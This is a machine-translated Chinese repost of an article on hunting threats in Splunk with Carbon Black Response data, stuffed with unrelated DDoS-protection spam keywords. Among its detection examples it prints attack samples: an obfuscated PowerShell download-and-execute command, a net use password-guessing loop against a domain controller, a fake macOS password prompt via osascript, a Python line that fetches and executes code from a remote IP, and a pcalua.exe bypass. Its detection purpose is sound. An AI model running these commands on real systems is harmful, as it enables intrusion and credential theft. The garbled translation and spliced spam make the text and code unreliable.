来自 CC防护 2021-02-20 15:00 的文章

服务器高防服务_能不能_韩国cdn防护

服务器高防服务_能不能_韩国cdn防护

数据分析(或者有人称之为威胁搜索)在任何规模上都可能是麻烦和压倒性的。然而,Splunk有能力大大降低这种复杂性。在我们的炭黑响应和Splunk系列的第一部分中,我们重点关注从炭黑响应中检索您的数据并将其输入Splunk。现在是时候深入研究Cb Response Splunk应用程序了,这样我们就可以开始分析我们的数据了。更多技巧,请观看点播网络研讨会:Splunk中碳黑响应数据的5种方式可以提高您的安全性当我在一家大公司工作时,ddos攻击及防御,我成了Splunk的超级粉丝,在那里我们不得不分析70000个端点的数据。将数据传送到Splunk有助于我们及时有效地分析和响应事件。随着我们的成熟,我们构建了特定的仪表板来帮助分析特定的数据集,而不必手动查询或运行保存的搜索。这个过程需要时间,而且本文中提出的许多想法不可能一蹴而就。但是,当你把它们整合到你的端点安全操作中时,我希望你能看到你在及时阻止威胁的能力上有了显著的提高,我在我自己的程序中看到了这一点。开发数据分析流程数据分析是一个持续的过程,应该每天和每周进行。它可能是由最近的情报或好奇心引起的。下面是一个简单的高层流程,可以帮助您理解要点:将这个风车与科学模型进行比较,你会发现许多相似之处:两者都是持续的过程,在分析信息时密切关注。开始广泛:最初,重点是广泛的,寻找进程(包括用户和命令行)或网络连接的正常情况焦点:下一步是根据使用情况、历史上下文和情报,确定这是否是一个有效的警报。不是每件事都必须或可以是一个警报,这就是为什么数据分析可以是令人满意的,也可以是不令人满意的警告和调查:如果你决定对一个新行为发出警报,它将导致调查。在这里,您可能会感受到定义不当的检测标准带来的痛苦。将检测定义得太窄,很少会出现警报;设置得太宽,您的团队将淹没在误报中,最终他们会忽略这种类型的警报调整和改进:利用你的调查不断调整你的检测标准,以提高准确性,同时也考虑到意想不到的分析我的基本查询通常是从大数据量的标准过程开始的。当我开始了解这个过程是如何运行的时,就很容易开始调整良性行为,或者至少是我目前不想看到的数据。从那以后,我通常会遇到一个十字路口:一种方法会导致潜在的高保真警报,而另一种方法则会导致需要更频繁审查的更具分析性的方法。无论我们是否选择在噪音很大的情况下发出警报,我们都需要随着时间的推移对其进行调整,并继续检查警报的保真度。本文将使用此框架重点介绍如何使用Splunk检测这些行为:Powershell.exeNet.exe文件Python和OsascriptPowershell.exe让我们从最高层开始:所有的东西PowerShell。如果你需要一个关于为什么你需要PowerShell.exe活动,阅读ATT&CK矩阵中MITRE的总结。我每次都在Splunk to surface中运行以下查询PowerShell.exe在以下环境中使用:`cb​​`process=PowerShell.exe|按计算机名统计值(命令行)然后我通过主机接收所有PowerShell命令行数据。这需要花费70000个端点的时间,所以我把重点放在许多计算机上的通用命令行上,忽略它,然后继续往下看。最终,无论您是在寻找新的行为,还是确认已知的行为,这都会引导您找到在您的环境中使用PowerShell的新方法。有人把这个过程称为威胁搜索;我称之为数据分析。你有多种类型的分析结果PowerShell.exe邪恶。是时候把这些经验转化为检测标准了。这个标准是我的分析的输出,它更具体一些:"C:\Windows\System32\WindowsPowerShell\v1.0\父进程"-w隐藏-c"的"w隐藏-c"的"$hqVR=[类型][类型](除"{3{3}{2{0{0{1}1}\"的"f‘c’,‘LienT’,’.wEb’,‘网络’,‘nET’;${x}=((gCI(\"V \""\"Arabible \""\""""":hqVR \"")。\"V `值值\":((\"{0{0{1{1{1{1{1}{1{1}{1}"1{f‘n’1}"f‘n’n’,‘ew ew’.调用())。}{0}{2}\'-f'n','adstri','g','downlo')。调用((\"{15}{10}{21}{4}{24}{20}{7}{5}{3}{38}{11….}\'-f'0a3','4'',ddos防御配置,‘f27b69’,‘ercont’,’/gi’,‘总线’,‘or-sec/2f’,‘thu’,‘raw/3’,‘ob’,‘t’,‘nt.c’,‘d7’,‘d7’,’/’,‘126e96’,,‘ht’,‘8c5ed’,‘d’,‘d’,‘om’,’/em’,‘gi’,‘ps:/’,‘p’,‘p’,‘f’,‘‘f’,‘6’,‘6’,‘dd’,‘ed5a’,‘5A’,‘‘’,‘4’,‘4’,‘5eeef3’,‘9B55 E79B0A A A A A’,‘9B55EEEF3’,‘9'、'c26'、'v'、'3f87bd015'、'ect'、'f'、'64e60c41'、'e'));。(\"{1}{0}\"-f'EX','I')"这是我们在野外看到的一些更高级的PowerShell应用。一些特定的行为会比其他行为更忠诚。根据您的环境不同,在特定的命令行字段(如-encodedCommand或"Download")上发出警报可能会太嘈杂。有时采取相反的方法并忽略common来发现异常,这是识别PowerShell可疑使用的最佳方法。您很可能需要频繁地调整这些,忽略字段、计算机、特定命令等。这是正常的做法,可以回到我概述的第一步:allpowershell。Net.exe文件类似于PowerShell,小米路由器防御ddos,net.exe文件是另一个攻击者用来靠土地生活的公用事业。这个例子会在网络上产生很多噪音。@对于/F%n英寸(用户.txt)执行@FOR/F%p in(通过.txt)DO@net use\\DOMAINCONTROLLER\IPC$/用户:域\%n%p 1>NUL 2>&1&&@echo[*]%n:%p&&@net use/delete\\DOMAINCONTROLLER\IPC$>NUL让我们把它分解:中的用户列表用户.txt和密码通过.txt,执行net use\\\IPC$/user:它将持续运行此操作,直到列表完成。输出如下:如果有一百个账户用户.txt文件,一百个实例net.exe文件会在这个主机上执行。根据您对网络执行的监视和警报,它可能会引发许多危险信号或没有危险信号。我们建议对特定的网络行为进行调整和监视,同时也要查找所有的网络行为。甚至每周报告都显示net.exe文件每个端点使用的计数有助于发现可疑活动。Osascript和Pythonosascript-e告诉应用程序"ScreenSaverEngine"激活-e告诉应用程序"ScreenSaverEngine"显示对话框"屏幕保护程序需要您的密码才能继续。密码错误!"&返回默认答案"",图标1带有隐藏答案,标题为"屏幕保护程序警报"AppleScript和Swift一起开始流行起来。我相信随着时间的推移,随着它的普及,网页cc防御功能破解版,我们会看到它的使用越来越迅速。在那之前,我们得到了osascript。Osascript在每台Mac上都有,而且它很好地集成到EmPyre中。EmPyre有一些用途。具体来说,它调用上面的命令来提示员工输入密码。另一个例子是如果演员把音量调大,然后启动Safari,打开一个到雷霆卡车的链接。python-c导入urllib2;r=urllib2.urlopen('http://5.2.6.1/');执行(r.read());Python、Ruby、Perl等等都可能被用于邪恶。我们在Windows上看不到太多,但是如果你在监视一个蜜罐或公共web服务器,你会很快意识到试图在服务器上运行Python的自动扫描程序。在AppleScript或Python的两种情况下,我们可以采用与以前相同的方法。MacOS和Linux上的情况有点不同。首先,了解土地的位置,了解公用事业在哪里使用,以及什么是正常的。这很棘手,但与上面类似,我会运行:`cb`process=osascript |按计算机名统计值(命令行)或者`cb`process=python或进程=python.exe或process=perl或process=ruby统计值(命令行),按计算机名上面的命令和以前一样,将按计算机名显示所有命令行。现在我们可以开始了解在我们的环境中什么是正常的,并清除良性事件。对于MacOS和Linux,这个过程需要更多的时间。有时每个进程可能会有更多的容量,这取决于所使用的应用程序和关联。新探测器开发时间!PoC:使用C:\windows\system32\pcalua.exe-空调:\文件.lnk执行.LNK文件或代码-pcalua.exe-a计算.exe#生活在陆地上-法布里齐奥(@0rbz_2;)2017年9月26日我们有一个新的旁路是用pcalua.exe在窗户上。在创建检测标准之前,ddos防御的保驾护航,我们需要了解一下这个过程是如何使用的,以及它在我们的环境中的使用位置。`cb​​`process=alupca.exe文件|按计算机名统计值(命令行)此查询向我们显示了计算机从pcalua.exe. 这就产生了我们使用它的基线,从中可以看出什么是正常的或不正常的。从概念验证代码来看,我们正在寻找.lnk文件的执行。您可以在命令行数据列表中滚动搜索.Ink或:`cb进程`=pcalua.exe命令行=*.lnk有什么发现吗?如果不是,这可能是生成高保真警报的一个好指标。如果有良性命中,您可以尝试进一步细化标准或了解将生成的误报量。所以标准已经到位了。现在是时候设置电子邮件警报了。我希望在搜索中添加以下内容:`cb​​`process=pcalua.exe命令行=*.lnk |表计算机名,用户名,命令行,链接进程,时间这确保了当电子邮件警报发送给我时,它提供了一些基本数据,让我了解发生了什么,发生在哪里,以及发生的时间。搜索默认情况下,CbR Splunk应用程序提供了58个已保存的搜索,这些搜索分为两类:亨特警觉的它的想法是,一旦你收到应用程序并运行了一些保存的搜索来为你的环境建立基线,你就可以开始调整狩猎保存的搜索并将它们变成警报。被标识为"警报"的已保存搜索将被设置为开箱即用,以便在您的环境中发出警报(请确保选中它们